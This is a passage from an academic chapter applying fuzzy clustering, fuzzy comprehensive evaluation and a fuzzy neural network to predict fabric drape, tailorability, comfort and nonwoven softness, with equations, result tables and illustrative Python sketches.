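    mu0 = U[:, nearest].mean(axis=1)                # average neighbor memberships per cluster
    x0a = np.concatenate(([1.0], x0))               # add the bias term
    return float(np.sum(mu0 * (coeffs @ x0a)))      # y = sum_k mu_k0 * g_k(x0)
```

With k_neighbors=1 this is the initial single-nearest-neighbor method; larger values give the hybrid method discussed next.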
Experiments and Results

A preliminary result was reported on using FLC for drape prediction from fabric mechanical properties with a relatively small (about 100 points) sample data set (J. Chen et al., 2002). The work presented here is based on a larger fabric data set (300+ data points). Here, each data point is of the form <x, y>, where x = <x1, …, x16> is a vector of dimension 16 corresponding to 16 mechanical properties of a fabric, and y is the fabric's drape coefficient. The objective here is to predict a fabric's drape coefficient value from its mechanical property values. We also experimented on tailorability prediction by FLC with a smaller (about 100 points) data set. After training on fabric drape data, we observed the prediction accuracies of the learned clusters on both training data and on a separate testing (drape) data set. As we expected, the prediction accuracy on training data is quite high (nearly 95% when we use three clusters). Increasing the number of clusters is observed to increase the prediction accuracy on the training data. Experiments on using the learned fuzzy model to predict drape values for unseen test data produce encouraging results. Without any further fine tuning, we achieved a prediction accuracy of about 88% on test data. Subsequently, the hybrid method combining K-nearest neighbor with FLC is investigated, which leads to a prediction accuracy of about 92%. In the initial prediction study (with a single nearest neighbor to estimate fuzzy membership), two experiments were conducted. In one experiment, we observe the prediction accuracies on testing data (disjoint from training data) in connection with various numbers of clusters used in training. We observed that using too many clusters in training is not helpful to reduce prediction error on unseen test data. As can be seen in Table 1, prediction accuracy on testing data initially increases with the increase of the number of clusters,
Table 1. Prediction accuracy vs. number of clusters (training data size is 200, testing data size is 100)

number of clusters      3      4      5      10     20     30
prediction accuracy     84.3   86.6   83.1   83.3   81.7   82.2
Table 2. Prediction accuracy vs. size of training data: number of clusters C = 4

training size           50     100    150    200    250
prediction accuracy     79.0   82.1   87.3   82.7   83.1
Table 3. Results using hybrid method with K-nearest neighbors: k = 3 and C = 6

training size           90     100    110    120    130    140
prediction accuracy     91.3   91.7   92.2   92.6   92.5   91.9
Table 4. Results using hybrid method with K-nearest neighbors: k = 5 and C = 4

training size           90     100    110    120    130    140
prediction accuracy     90.1   90.7   91.3   91.9   91.8   91.3
but then it starts getting worse. This suggests that using too many clusters for training is likely to overfit the training data, and the clusters obtained actually lose generalization power and thus cause the drop in prediction accuracy. In the other experiment, we tried different sizes for the training and testing data split, and observed the resulting prediction accuracy on testing data. Table 2 shows the prediction accuracy in connection with training data size (we have a total of 300 data points). It is obvious that the prediction accuracy initially improves with the growth of the training data size, but after the training data size reaches 150 (half of the total data), the prediction accuracy deteriorates. Again, here we observe the effect of overfitting. The lesson is that training with too many data points is not necessarily a blessing: The models discovered may not generalize well. An intuitive explanation is that when the training data set is too big, the fuzzy clusters may overfit the data by memorizing the peculiarities of data, and thus they do not give good prediction results on unseen data. We have implemented the hybrid method combining the K-nearest neighbor method with FLC for fabric drape prediction. We find that the hybrid approach improves prediction accuracy further to about 92%. Tables 3 and 4 show the results of two experiments with different values for K and C. In these two experiments, the total data set size is 183 (rather than 300). Again, one can in some sense observe that a bigger training data size may not always produce better performance, and overfitting must be avoided. For tailorability prediction, we performed experiments using a data set of about 100 points. The data came from the tailorability test laboratory at the University of Louisiana at Lafayette, where the fabric tailorability scores were obtained through actual sewing tests of the fabrics. The FLC method is able to produce a prediction accuracy of 92% with a 75-25 split between training data and testing data.
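The train/test experiments summarized in Tables 1 through 4 follow a simple pattern that can be sketched as below, reusing the fuzzy_linear_clustering and flc_predict sketches given earlier. The chapter does not spell out how prediction accuracy is computed for a continuous drape coefficient, so the accuracy measure here, 100·(1 − mean relative error), is an assumption made purely for illustration.

```python
import numpy as np

def accuracy(y_true, y_pred):
    """Assumed accuracy measure: 100 * (1 - mean relative error)."""
    rel_err = np.abs(y_pred - y_true) / np.abs(y_true)
    return 100.0 * (1.0 - rel_err.mean())

def run_experiment(X, y, train_size, C=4, k_neighbors=3, seed=0):
    """Train on a random split of `train_size` points and report accuracy
    on the held-out points (cf. Tables 1-4)."""
    rng = np.random.default_rng(seed)
    idx = rng.permutation(len(y))
    tr, te = idx[:train_size], idx[train_size:]
    coeffs, U = fuzzy_linear_clustering(X[tr], y[tr], C=C)
    preds = np.array([flc_predict(x, X[tr], coeffs, U, k_neighbors) for x in X[te]])
    return accuracy(y[te], preds)
```

Sweeping C or train_size in a loop reproduces the kind of overfitting curves discussed above.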
Summary for Fuzzy Clustering for Predicting Fabric Drape and Tailorability

Information technology is bringing tremendous opportunities to the textile and garment industry. Our online database and its intelligent search engine provide cloth designers, manufacturers, and retailers with a useful and convenient tool to quickly find suitable fabric materials that best fit their needs. The flexible queries supported by our system enhance the system's usability. Data mining methods such as fuzzy clustering are applied effectively to discover patterns relating fabric properties. The system can be seen as a first step toward a comprehensive online business exchange system for cloth designers, manufacturers, retailers, and fabric manufacturers. Fuzzy linear clustering appears to be quite effective for predicting fabric appearance from fabric physical properties. The experiments indicate a promising application of the fuzzy approach to the discovery of patterns relating fabric properties. Moreover, the experiments show that we need to guard against overfitting in applying fuzzy linear clustering: Trying to fit the training data with too many clusters or training with too many data points may cause a loss of generalization power. Our study also indicates that the hybrid method combining the K-nearest neighbor method with fuzzy linear clustering produces superior prediction accuracy. Besides further experiments and validations of the fuzzy linear clustering method, we see several ways to extend our work of applying the fuzzy approach to the search engine on the fabric database. These include the application of fuzzy linear clustering to discover new patterns among fabric properties, the use of the fuzzy C-means algorithm for fabric classification and query answering, and the development of hybrid approaches combining fuzzy methods with decision-tree learning to predict fabric appearance and tailorability. In a recent book on fuzzy databases
(Galindo, Urrutia, & Piattini, 2006), the fuzzy clustering method has been combined with the fuzzy query language fSQL for an interesting application. We would like to compare our fuzzy clustering and query-answering method with the fSQL approach. We are investigating hybrid methods that combine fuzzy clustering with decision-tree learning for predicting fabric appearance and tailorability. The idea is to first apply the fuzzy C-means algorithm for making numerical valued fabric properties discrete, and then construct a decision tree from the fabric property data. The decision tree can be used for the prediction of fabric appearance or tailorability, which will be incorporated into the search engine.
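A minimal sketch of the hybrid idea just outlined, discretizing each numerical fabric property with a one-dimensional fuzzy C-means pass and then feeding the discrete labels to a decision-tree learner, is given below. The three-level discretization and the use of scikit-learn's DecisionTreeClassifier are illustrative choices, not the authors' implementation.

```python
import numpy as np
from sklearn.tree import DecisionTreeClassifier

def fcm_1d(values, c=3, m=2.0, iters=100):
    """One-dimensional fuzzy C-means; returns, for each value, the index of
    the cluster with the highest membership (a discrete label)."""
    v = np.asarray(values, dtype=float)
    centers = np.linspace(v.min(), v.max(), c)
    for _ in range(iters):
        d = np.abs(v[None, :] - centers[:, None]) + 1e-12     # distances to centers
        U = d ** (-2.0 / (m - 1.0))
        U /= U.sum(axis=0)                                    # fuzzy memberships
        centers = (U ** m @ v) / (U ** m).sum(axis=1)         # center update
    return np.argmax(U, axis=0)

def fit_discretized_tree(X, labels, c=3):
    """Discretize every property column with fuzzy C-means, then fit a tree
    that predicts the appearance/tailorability class in `labels`."""
    Xd = np.column_stack([fcm_1d(X[:, j], c=c) for j in range(X.shape[1])])
    return DecisionTreeClassifier(max_depth=4).fit(Xd, labels)
```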
FUZZY COMPREHENSIVE METHOD FOR EVALUATING APPAREL COMFORT
Textile comfort performance had long been considered impossible to describe quantitatively until a new approach, the fuzzy comprehensive evaluation technique, was proposed (Rong & Slater, 1992). It has become a very popular and widely used fuzzy mathematical technique applied in a variety of areas. For example, it is applied as a new approach to the evaluation of fabric hand and performance in textile engineering (Raheel & Liu, 1991). The technique was also applied to the objective evaluation of fabric softness (Y. Chen et al., 2000). Statistical methods of ANOVA (analysis of variance) and factor analysis were suggested to determine the fuzzy factor subset A~ from the fabric mechanical property data measured with the KES-FB instruments. Although it is difficult to define fabric comfort performance accurately, the fuzzy comprehensive evaluation technique introduced here, which takes into account the measured values of relevant mechanical or physical attributes of the material and the durability (the changes of these measured values) within its serviceable lifetime, and consumers' preference for specific end uses as well, can be considered a comprehensive approach to evaluating textile comfort performance. This approach provides an alternative to the use of instrumental measurements alone and makes it possible to assess fabric comfort behavior objectively. Here, we will first introduce the mathematical principles of fuzzy comprehensive evaluation by introducing four evaluation models and discussing the selection of the models. Then, we discuss the analytical procedure and the evaluation results of three types of female ready-to-wear casual summer clothing (blouse, slacks, and underpants) based on the variations of their physical properties at various abrasion times and the relative importance of physical-comfort-related factors (weight, thickness, bending length, and air permeability) obtained by questionnaires answered by female university students.

Mathematical Principles
Fuzzy comprehensive evaluation is a type of conversion operation among different fuzzy sets. A general form B~ = A~ * R~ is used to express a process that converts the fuzzy factor subset (vector) A~ into the fuzzy grade subset (vector) B~ through a fuzzy relation R~. It has become a very popular and widely used fuzzy mathematical technique applied in a variety of areas, for example, in the evaluation of fabric hand and performance in textile engineering (Raheel & Liu, 1991). Given a certain computational model of A~ * R~, or a specific conversion relation R~ (i.e., membership function), one can get different mathematical evaluation models, each having a different essence and therefore dramatically different grading results. Hence, both the essence of each fuzzy comprehensive evaluation model and the determination of the fuzzy membership function have to be understood thoroughly so as to apply these models accurately.
Essence of Fuzzy Comprehensive Evaluation Models

For the fuzzy comprehensive evaluation operator B~ = A~ * R~, the current models are below (Rong & Slater, 1992; Wang, 1984):

I.   Model (∧, ∨):  b_j = ∨_{i=1}^{m} (a_i ∧ r_ij)
II.  Model (·, ∨):  b_j = ∨_{i=1}^{m} a_i r_ij
III. Model (·, ⊕):  b_j = min{1, Σ_{i=1}^{m} a_i r_ij}
IV.  Model (∧, ⊕):  b_j = min{1, Σ_{i=1}^{m} min{a_i, r_ij}}    (4)

in which a_i is a member of A~ with i = 1, …, m. For Model I, Model (∧, ∨), the operator is

b_j = ∨_{i=1}^{m} (a_i ∧ r_ij),    (5)
where ∧ and ∨ denote the minimum (min) and maximum (max) operations respectively, namely,

b_j = max[min(a_1, r_1j), min(a_2, r_2j), …, min(a_m, r_mj)].    (6)

In this model, the grade of membership r_ij of a single element v_i to a corresponding evaluation grade u_j is amended as

r*_ij = a_i ∗ r_ij = a_i ∧ r_ij = min(a_i, r_ij).    (7)

This clearly indicates that a_i is the upper limit of r*_ij (j = 1, 2, ⋯, n) in considering multielement evaluation; namely, the grade of membership of element v_i to any evaluation grade u_j (j = 1, 2, ⋯, n) is restricted to be less than a_i. Obviously, the ∨ in the operator accounts only for the most important element (of maximum r*_ij) in regard to every evaluation grade u_j while neglecting the contributions of all other elements. This is a kind of major-element-dominating evaluation. Hence, this model is only suitable when there are not many elements (m is small). It is noteworthy that A~ should not be manipulated for weight distribution among elements, and we should not let Σa_i = 1 (i = 1, 2, ⋯, m) since, in that case, the small weight values a_i would mask the contributions of various elements.

For Model II, Model (·, ∨), the operator is

b_j = ∨_{i=1}^{m} a_i r_ij;    (8)

namely,

b_j = max[(a_1 r_1j), (a_2 r_2j), …, (a_m r_mj)].    (9)

The difference between Model (·, ∨) and Model (∧, ∨) is that r*_ij = a_i ∧ r_ij is replaced by r*_ij = a_i r_ij; r_ij is amended by being multiplied by a less-than-1 factor, a_i, instead of being restricted by an upper limit. Although the contributions of every element are taken into account, A~ is by no means a weighting factor vector and it is not necessary that Σa_i = 1 (i = 1, 2, ⋯, m).

For Model III, Model (·, ⊕), the operator is

b_j = (a_1 r_1j) ⊕ (a_2 r_2j) ⊕ … ⊕ (a_m r_mj),    (10)

where the symbol ⊕ denotes the bounded sum, defined as α ⊕ β = min(1, α + β). In this model, b_j is calculated as the bounded sum of all r*_ij = a_i r_ij instead of the maximum as in Model (·, ∨). In this way, it takes into account the contributions of all elements v_i (i = 1, 2, ⋯, m). The entries of the factor set A~ = (a_1, a_2, …, a_m) are weighting factors and their sum obeys Σa_i = 1 (i = 1, 2, …, m). Since Σ a_i r_ij ≤ 1 (i = 1, 2, …, m), the operator becomes

b_j = (a_1 r_1j) + (a_2 r_2j) + … + (a_m r_mj),    (11)

where Σa_i = 1 (i = 1, 2, …, m). In this case, the model can also be denoted as Model (·, +).

For Model IV, Model (∧, ⊕), the operator is

b_j = (a_1 ∧ r_1j) ⊕ (a_2 ∧ r_2j) ⊕ … ⊕ (a_m ∧ r_mj).    (12)
Similar to Model (∧, ∨), this model restricts the upper limit of r*_ij to be a_i, namely, r*_ij = a_i ∧ r_ij. However, it calculates b_j as the bounded sum of all r*_ij. This model accounts for the contributions of all elements, but does not require Σa_i = 1 (i = 1, 2, …, m).
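The four composition operators of Equations 4 to 12 can be written compactly. The sketch below assumes A~ is given as a vector a of length m and R~ as an m × n matrix of memberships, and simply evaluates b_j for each model; it is an illustration, not code from the original study.

```python
import numpy as np

def fuzzy_evaluate(a, R, model="III"):
    """Compute B = A * R for the four composition models of Equation 4.
    a: factor vector (length m); R: m x n matrix of memberships r_ij."""
    a = np.asarray(a, dtype=float)[:, None]         # column vector for broadcasting
    R = np.asarray(R, dtype=float)
    if model == "I":                                # Model (min, max)
        return np.max(np.minimum(a, R), axis=0)
    if model == "II":                               # Model (product, max)
        return np.max(a * R, axis=0)
    if model == "III":                              # Model (product, bounded sum)
        return np.minimum(1.0, np.sum(a * R, axis=0))
    if model == "IV":                               # Model (min, bounded sum)
        return np.minimum(1.0, np.sum(np.minimum(a, R), axis=0))
    raise ValueError("model must be 'I', 'II', 'III', or 'IV'")

# Toy example: four factors, six evaluation grades.
a = [0.4, 0.3, 0.2, 0.1]
R = np.random.default_rng(1).random((4, 6))
print(fuzzy_evaluate(a, R, "III"))
```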
Selection of Fuzzy Comprehensive Evaluation Models

Different people in different situations may have different views of evaluating a set of objects. Sometimes only the major element is important, that is, the evaluation is major-element dominant, whereas sometimes the conditions of all the elements are important regardless of the value of the major element. The above models can to some extent reflect these different views of object evaluation. For one object under the same A~ and R~, the evaluation grade sets from the above models obey the following theorem (Y. Y. Chen, Liu, & Wang, 1983):

B(∧, ⊕) ≥ B(·, ⊕) ≥ B(·, ∨) and B(∧, ⊕) ≥ B(∧, ∨) ≥ B(·, ∨).    (13)
This can be proven by comparing their operators, that is, ∀ a, b ∈ [0, 1], a·b ≤ a ∧ b ≤ a ∨ b ≤ a ⊕ b. Therefore, Model (·, ∨) and Model (∧, ⊕) account more for the contributions of nonmajor elements than Model (∧, ∨) while still allowing for the dominant effect of the major element. Hence, Model (·, ∨) and Model (∧, ⊕) are advisable to use when Model (∧, ∨) fails or when the nonmajor elements need to be taken into account more fully. Model (·, ⊕) is essentially a weighted-average model, accounting for the contributions of all elements according to their weights, and is therefore more suitable to cases where the whole set of elements is of interest. In practical use, the relative comparison of the entry values of an evaluation grade subset, B~, is more meaningful than their absolute values. To compare or evaluate a set of objects, one can first calculate B~ using Model (∧, ∨) and
Model (·, ⊕), and then calculate B~ using either Model (·, ∨) or Model (∧, ⊕). According to the above theorem (Equation 13), if the values of B(∧, ∨) and B(·, ⊕) are rather small, Model (·, ⊕) is more advisable; otherwise, Model (·, ∨) is. For the same set of objects, different evaluation results could be obtained using different models. This is comparable to the fact that different conclusions may be drawn for the quality order of a set of objects when they are viewed from different angles. To comprehend the results from different models, a second-stage comprehensive evaluation can be carried out using Model (·, ∨). The multistage evaluation can also allow one to analyze complex systems with different facets of objective measures (Rong & Slater, 1992).
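One literal reading of this selection rule, reusing the fuzzy_evaluate sketch above, is shown below; the numeric threshold for "rather small" is an assumption made only for illustration.

```python
# Sketch of the model-selection heuristic described above.
def select_model(a, R, small=0.2):
    """Return 'III' (the weighted-average style model) when both B(min,max)
    and B(product,bounded-sum) come out rather small; otherwise return 'II'."""
    b_min_max = fuzzy_evaluate(a, R, "I")        # Model (min, max)
    b_prod_bsum = fuzzy_evaluate(a, R, "III")    # Model (product, bounded sum)
    if b_min_max.max() < small and b_prod_bsum.max() < small:
        return "III"
    return "II"                                  # Model (product, max)
```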
Analytical Procedure and Results

The performance of textiles depends not only on their initial properties but also, more importantly, on how they behave in service. Here, we illustrate the analytical procedure for and results of how the fuzzy comprehensive evaluation models are applied to the objective evaluation of textile performance based upon initial properties in conjunction with serviceability and durability, as well as end users' preferences. The analyses are based on two sets of experimental data: the changes occurring during different stages of incremental abrasion testing and a survey of consumer comfort preferences. The first experimental data set contains the variations of thickness, weight per unit area, softness and stiffness (which produce changes in the bending length), and air permeability of plain and twill cotton, plain and twill wool, plain silk, and plain polyester fiber/cotton (65/35) blended fabrics, which were subjected to abrasion times of 0, 2, 3, 4, 5, 6, 7, and 8 minutes in an accelerator. The second data set contains the relative importance of physical-comfort-related factors (weight, thickness, bending length, and air permeability) of three types of female ready-to-wear casual summer clothing (blouse, slacks, and
underpants) recorded in questionnaires answered by female university students. In addition, multistage evaluation can be used to allow one to analyze a situation where there are different facets of an objective set of measures, while avoiding the difficulty of determining the grade of membership of the fuzzy subset A~, a step that would be made too complicated by the presence of many different components or effects in each element when evaluating an article (a fabric, say). The grades of membership, μ(x), of thickness, weight, and bending length are calculated according to the formula below:

μ(x) = (x_{i+1} − x) / d,    x_i < x ≤ x_{i+1}  (i = 1, 2, …, 6),    (14)

where x represents some measure of the property under consideration. Conversely, since an increase in air permeability is considered desirable whereas a decrease in the other properties is advantageous, the formula for the membership function of air permeability is

μ(x) = (x − x_{i+1}) / d,    x_{i+1} < x ≤ x_i  (i = 1, 2, …, 6).    (15)
In all cases, the property is divided into six grades, and d, the difference between successive grade intervals, is equal to (xmax - xmin)/5, where xmax and xmin are the maximum and minimum values of each property item, respectively. The grades of membership of each property in different abrasion stages can be calculated for each fabric. Using Model III, that is, Model ( •, ⊕):
b_j = min{1, Σ_{i=1}^{m} a_i r_ij},
the evaluation result for the initial property of a plain cotton fabric used for a blouse is B~ = (0.10, 0.15, 0.22, 0.04, 0.15, 0.35).
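A small sketch of the grade-of-membership calculation in Equations 14 and 15, combined with the Model III evaluation just shown, is given below. The exact indexing of the six grade boundaries is not fully spelled out in the text, so the interval-to-grade mapping here (boundaries spaced d = (xmax − xmin)/5 apart) is one plausible reading rather than the authors' exact procedure.

```python
import numpy as np

def membership_grades(x, x_min, x_max, increase_is_good=False):
    """Grade-of-membership vector for a measurement x over six grades
    (cf. Eqs. 14-15); the grade spacing is d = (x_max - x_min)/5."""
    d = (x_max - x_min) / 5.0
    bounds = x_min + d * np.arange(6)            # assumed boundaries x_1 ... x_6
    mu = np.zeros(6)
    for i in range(5):
        lo, hi = bounds[i], bounds[i + 1]
        if lo < x <= hi:
            # decrease desirable: (x_{i+1}-x)/d; increase desirable: mirrored form
            mu[i] = (x - lo) / d if increase_is_good else (hi - x) / d
    if x <= bounds[0]:
        mu[0] = 1.0                              # clamp values at or below the range
    return mu

# The resulting grade vectors (one per property) form the rows r_ij of R~,
# which can then be combined with the factor weights a_i via Model III,
# e.g. fuzzy_evaluate(a, R, "III") from the sketch given earlier.
```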
Similarly, results can be obtained for this fabric at different levels of abrasion and for different end uses, as well as the corresponding results for other fabrics. If an evaluation result expressed in a single number is desired, it can usually be obtained by means of a weighted-average calculation, for example:

α = Σ_{j=1}^{m} b_j^k α_j / Σ_{j=1}^{m} b_j^k,    (16)
where αj is the individual value of α (just as μj is the value of μ for each term in Equation 14 above) ranging from 1 to 6. The power component k can be determined for each specific case, though it is normally suggested that k should be set at 2. Assuming the importance of all properties at each of the eight abrasion times is equal and Model III is used, the second-stage evaluation can be simply carried out. The final single-value results of fuzzy comprehensive evaluation for all fabrics in three end uses are derived, as listed in Table 5 (Rong & Slater, 1992). By comparing the final results, we can see that plain wool is preferred to twill wool fabric for blouses, slacks, and underpants since the former has a higher comprehensive-evaluation value than the latter; the same is true for plain and twill cotton fabrics. Silk is the best among these six results for the three end uses since it has the highest evaluation.
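Equation 16 collapses an evaluation vector B~ into a single score. A minimal sketch, using the plain-cotton (blouse) vector obtained above and the suggested power k = 2, with grade values α_j = 1, …, 6:

```python
import numpy as np

def single_score(b, k=2):
    """Weighted-average defuzzification of Equation 16:
    alpha = sum(b_j**k * alpha_j) / sum(b_j**k), with alpha_j = 1..6."""
    b = np.asarray(b, dtype=float)
    alpha_j = np.arange(1, len(b) + 1)
    return float(np.sum(b ** k * alpha_j) / np.sum(b ** k))

# Single-stage example with the initial-property vector for plain cotton (blouse).
# This prints about 4.6; the Table 5 figures differ because they aggregate all
# eight abrasion stages in a second-stage evaluation.
print(single_score([0.10, 0.15, 0.22, 0.04, 0.15, 0.35]))
```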
Table 5. Single output of fuzzy comprehensive evaluation for three fabric end uses

Fabric Type               Blouse   Slacks   Underpants
Plain cotton              3.42     3.54     3.42
Twill cotton              1.56     1.46     1.58
Plain wool                4.14     4.14     4.14
Twill wool                2.96     2.80     3.00
Plain silk                5.04     5.19     5.01
Plain polyester/cotton    3.74     3.68     3.77

Summary for Fuzzy Comprehensive Method for Evaluating Apparel Comfort

The fuzzy comprehensive evaluation technique is demonstrated as a new way of dealing with textile comfort and performance, two widely recognized phenomena that, being vague and affected by many attributes, are usually assessed subjectively. It can be seen from the procedure and the results that it is possible to establish a procedure for the assessment and selection of a fabric for a specific end use, with account taken of the consumer's preference together with considerations of durability. Although the results in this example may not be universally representative, of course, because of the limited availability of experimental data, they are still able to illustrate how the technique can provide useful information to textile and clothing manufacturers. Once the process is established, it should be possible to develop an intelligent database system for comprehensively evaluating textile fabric comfort and performance.

FUZZY NEURAL NETWORK FOR GRADING FABRIC SOFTNESS

Application Scenario

In the manufacture of fabric materials, soft hand is always a critical priority to satisfy customers. Even denim manufacturers are pursuing the soft touch of jeans by improving weaving and finishing so as to create a denim lifestyle: casual and comfortable (Rudie, 1996). Nonwoven fabrics, particularly spunbond and air-blown nonwovens, are more like papery sheeting materials because of their specific structure, a randomly laid and bonded fiber web that is distinct from the yarn-interlacing structure of woven fabrics. Therefore, nonwoven fabrics usually lack fabric soft hand. The improvement of softness for spunbond nonwoven fabrics has become strategically important in many end-use applications. Many approaches have been proposed for improving nonwoven softness, including the use of chemical softeners, enzymatic
treatment (mainly for natural fiber nonwovens), and molecular modifications. A question raised by nonwoven manufacturers is how to objectively evaluate the improvement of nonwoven softness after the use of new raw materials, adjustment of processing parameters, or application of new finishing methods. This means that we need to develop an instrumental method that is able to sensitively detect any incremental improvement in fabric softness. Previous research with this aim was primarily focused on tissue and paper towel products. An example was the use of a mechanical stylus scanning method to measure the surface property of tissues (Rust, Keadle, Allen, & Barker, 1994). This research proposed a frequency index obtained through the fast Fourier transform (FFT) to describe tactile sensitivity. Other researchers (Kim, Shalev, & Barker, 1994) studied the softness property of paper towels using the KES-FB instruments. They developed a linear regression model to predict the so-called softness intensity. Both of the above studies rely on human subjective input in grading the softness of tissue or paper towel products. Objective hand measurements of nonwoven fabrics were investigated in Japan (Kawabata, Niwa, & Wang, 1994). This research applied the same technique that Professor Kawabata and his coworkers developed for evaluating the hand of wool and wool-rich suiting fabrics. Recently, a neural network technique was used for the online prediction of tissue softness (Sarimveis & Retsina, 2001). An inferential sensor operated in real time
together with a distributed control system. An application of the neural network technique for predicting fabric end uses was also reported (Y. Chen, Zhao, & Collier, 2001). In this case study, an objective method of fuzzy neural networks for evaluating nonwoven softness is exhibited. The purpose of this study is to investigate a practical approach to grading
the softness of nonwoven fabrics based on nonwoven mechanical properties instead of human hand judgment. Spunbond polypropylene nonwovens are targeted in this study because of their diverse end uses ranging from personal care to home interior. The research method involves two techniques: the KES-FB instruments and neural network computing. The KES-FB instruments are
a de facto method for measuring fabric mechanical properties in academia and industry. The neural network computing technique is among the most promising approaches to solving real-life fuzzy problems because of its power in pattern recognition, particularly in learning highly nonlinear relationships.

Table 6 (fragment: parameters X9–X16)

Kawabata Parameter                                   Input Code
Bending Hysteresis 2HB (gf·cm²/cm)                   X9
Compressive Linearity                                X10
Compressive Energy (gf·cm/cm²)                       X11
Compressive Resilience (%)                           X12
Maximum Compressive Rate (%)                         X13
Mean Frictional Coefficient                          X14
Mean Deviation of Mean Frictional Coefficient        X15
Mean Surface Roughness (micron)                      X16
Approach

Fabric mechanical properties deal with these basic mechanical deformations: extension, shear, bending, and compression. Fabric softness or hand is believed to be a complex behavior of these mechanical properties, plus surface friction and roughness (Hearle, 1993a, 1993b). The KES-FB instruments are ideal for measuring fabric basic mechanical properties and can provide 16 instrumental parameters (Table 6). A computerized data acquisition system recently developed at Louisiana State University is used to record and calculate the KES-FB data automatically (Y. Chen, Zhao, & Turner, 2001). According to industry input, two types of polypropylene spunbond nonwovens were
targeted. One (Target 2) had the best soft hand with a desired output value of 1, and the other (Target 1) had the worst softness with a desired output value of 0. From each of these targeted nonwoven fabrics, 15 specimens were prepared and tested using the KES-FB instruments. To establish a neural network model for predicting the nonwoven softness, the obtained KES-FB data were imported into the commercial software NeuroSolutions™ (Version 4 for PCs) for training (Principe, Euliano, & Lefebvre, 2000). This software features MS Excel compatibility and can easily run on a PC desktop with Excel-format data input. It provides a fuzzy logic neural network model, CANFIS, to enhance computer learning performance (Jang, Sun, & Mizutani, 1997). With integrated fuzzy rules (membership functions) as a preprocessor, the neural network can characterize inputs that are not very discrete and establish an efficient model quickly. Figure 5 illustrates the structure of this neuro-fuzzy network. The CANFIS model includes two types of fuzzy membership functions, the bell-shaped curve and the Gaussian-shaped curve. The number of membership functions assigned to each
network input can also be selected (usually 2 to 4 for small- or medium-sized data sets). The fuzzy models applied in the CANFIS model are the Tsukamoto and Sugeno fuzzy models; we refer to Jang et al. for more details. The configuration of the CANFIS model needs to specify the number of network hidden layers, the type of membership function, the number of membership functions per input, and the type of fuzzy model. In this case study, two hidden layers, the bell membership function, and the Tsukamoto model were used. Six experimental spunbond nonwovens were selected and measured using the KES-FB instruments to form a test data set. These spunbond nonwovens were divided into two groups, Group 1 (four samples) and Group 3 (two samples), each representing a type of modified polypropylene. The softness of these six samples was graded by the established neural network model. These softness grades, with numerical values between 0 and 1, were defined as the softness index.

Figure 6. Neural network learning curve (training MSE and cross-validation MSE versus training epoch)

Table 7. Softness grades by neural network model

Sample ID    Group      Softness Index
Target 1     -          0
#1.1         Group 1    0.55
#1.2         Group 1    0.72
#1.3         Group 1    0.28
#1.4         Group 1    0.52
#3.1         Group 3    1.00
#3.2         Group 3    0.98
Target 2     -          1

Results and Discussion

The fuzzy logic neural network model was established by training on the training data set (Target 1 and Target 2). Figure 6 shows the learning curve for this model. To assess the performance of the established network model, the mean square error (MSE) was calculated (Principe et al., 2000). MSE is defined as

MSE = [Σ_{j=0}^{P} Σ_{i=0}^{N} (d_ij − y_ij)²] / (NP),    (17)
where P is the number of output processing elements, N is the number of exemplars (sample points) in the data set, yij is the network output for exemplar i at processing element j, and dij is the desired output for exemplar i at processing element j. In the present study, the final MSE value is 0.0027 for the training and 0.0096 for cross-validation. This means that the trained model is highly accurate. Table 7 lists the grading results for the six tested samples. According to these softness indexes, it can be understood that the softness of the nonwoven samples in Group 1 is similar to that of Target 1 because of their lower softness index values, varying between 0.28 and 0.72. In contrast, the nonwoven samples in Group 3 (3.1 and 3.2) have a very similar softness index to that of Target 2. As a result, the softness index can be used for softness interpretation and comparison among different spunbond nonwoven fabrics because numerical grading values for fabric softness are available. This facilitates communication between manufacturers and consumers. For a graphical interpretation of the softness difference among the spunbond nonwoven samples in Group 1 and Group 3, with reference to Target 1 and Target 2, discriminant analysis can be used (SAS Institute Inc., 1990). The canonical discriminant function is defined as

CAN = u_1 x_1 + u_2 x_2 + … + u_16 x_16,    (18)
where CAN is a discriminant score, ui is a canonical coefficient (discriminant weight), and xi is a
Figure 7. Fabric softness difference interpreted by discriminant analysis
Figure 8. Fabric softness difference interpreted by first two discriminant functions
KES-FB instrumental variable. The canonical coefficient vector u = (u1, u2, …, u16) can be obtained by solving the following matrix equation (Lindeman, Merenda, & Gold, 1980):
(W⁻¹B − λI)u = 0.    (19)

W⁻¹ is the inverse of W, the pooled within-group matrix of sums of squares and cross-products, calculated by

W = Σ_j S(j)    (j = 1, 2, …, 4, representing the jth group),    (20)

where S(j) = (S_kl^(j))_{16×16} and

S_kl^(j) = Σ_{i=1}^{n_j} (x_kij − x̄_kj)(x_lij − x̄_lj)    (21)

(k, l = 1, 2, …, 16; n_j = number of samples in Group j). B is the between-group matrix of sums of squares and cross-products expressed as

B = (b_kl)_{16×16},  where  b_kl = Σ_{j=1}^{4} n_j (x̄_kj − x̄_k)(x̄_lj − x̄_l).    (22)

I is an identity matrix. λ is called an eigenvalue of the matrix W⁻¹B and can be determined by the following characteristic equation: |W⁻¹B − λI| = 0.
The number of eigenvalues is equal to the number of groups minus 1 (here 4 - 1 = 3). Substituting each λ into the matrix W⁻¹B − λI allows the determination of the corresponding adjoint matrix of W⁻¹B − λI. Any column of the adjoint matrix of W⁻¹B − λI is an eigenvector u associated with the eigenvalue λ. In the case of using discriminant analysis for classifying the four nonwoven fabric groups discussed here, three canonical discriminant functions (CAN1, CAN2, and CAN3) are obtained. Using these three CANs as a coordinate system, the four nonwoven fabric groups can be plotted in this three-dimensional space (Figure 7).
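A sketch of this canonical discriminant computation (Equations 19 to 22) is shown below. It uses numpy's eigen-solver on W⁻¹B rather than the adjoint-matrix construction described above; the two routes give the same eigenvectors up to scaling. The group labels and the 16-variable layout are assumed to follow the KES-FB setup.

```python
import numpy as np

def canonical_discriminants(X, groups, n_components=3):
    """Canonical discriminant functions from a (samples x variables) matrix X
    and one group label per sample; returns the CAN scores and eigenvalues."""
    X = np.asarray(X, dtype=float)
    groups = np.asarray(groups)
    grand_mean = X.mean(axis=0)
    p = X.shape[1]
    W = np.zeros((p, p))                       # pooled within-group SSCP (Eqs. 20-21)
    B = np.zeros((p, p))                       # between-group SSCP (Eq. 22)
    for g in np.unique(groups):
        Xg = X[groups == g]
        mg = Xg.mean(axis=0)
        D = Xg - mg
        W += D.T @ D
        diff = (mg - grand_mean)[:, None]
        B += len(Xg) * (diff @ diff.T)
    eigvals, eigvecs = np.linalg.eig(np.linalg.solve(W, B))   # eigenproblem of W^-1 B
    order = np.argsort(eigvals.real)[::-1]
    U = eigvecs.real[:, order[:n_components]]  # columns are the coefficient vectors u
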